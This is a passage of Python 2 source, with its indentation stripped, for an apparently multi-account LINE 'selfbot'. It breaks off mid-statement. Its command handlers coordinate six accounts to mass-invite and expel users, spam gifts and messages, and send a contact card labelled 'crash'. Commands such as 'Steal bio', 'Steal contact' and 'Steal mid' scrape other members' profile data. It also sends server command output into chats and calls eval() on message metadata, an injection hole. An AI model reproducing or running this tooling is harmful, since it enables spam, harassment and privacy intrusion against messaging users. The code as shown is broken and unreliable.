elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite:"," ")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'contact bot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#-----------------------------++++-----------------
#=======================================================
elif msg.text.lower() == "crash":
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#-----------------=============================
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
kt.sendMessage(msg)
#=================================================
#==================================================
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif msg.text.lower() == 'Allbio:':
if msg.from_ in owner:
string = msg.text.lower().replace("allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kt.getProfile()
profile.statusMessage = string
kt.updateProfile(profile)
cl.sendText(msg.to,"successfully turn it into: " + string + "")
elif "Bot1 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot1 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
kt.sendText(msg.to,"change name: "+string+"\nsucces")
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#------------------------_--------------------------------------
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif msg.text in ["Creator"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Creator Saya ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"succes add to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Succes remove admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-jp" in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-jp ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'jp')
cl.sendText(msg.to,trs)
print '[Command] Translate jp'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-th " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-th ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate th'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
elif msg.text in ["Settings","Set"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs up Har Har")
kk.sendText(msg.to,"PONG double thumbs up Har Har")
kc.sendText(msg.to,"PONG double thumbs up Har Har")
ks.sendText(msg.to,"PONG double thumbs up Har Har")
kt.sendText(msg.to,"PONG double thumbs up Har Har")
cl.sendText(msg.to,"PONG double thumbs up Har Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
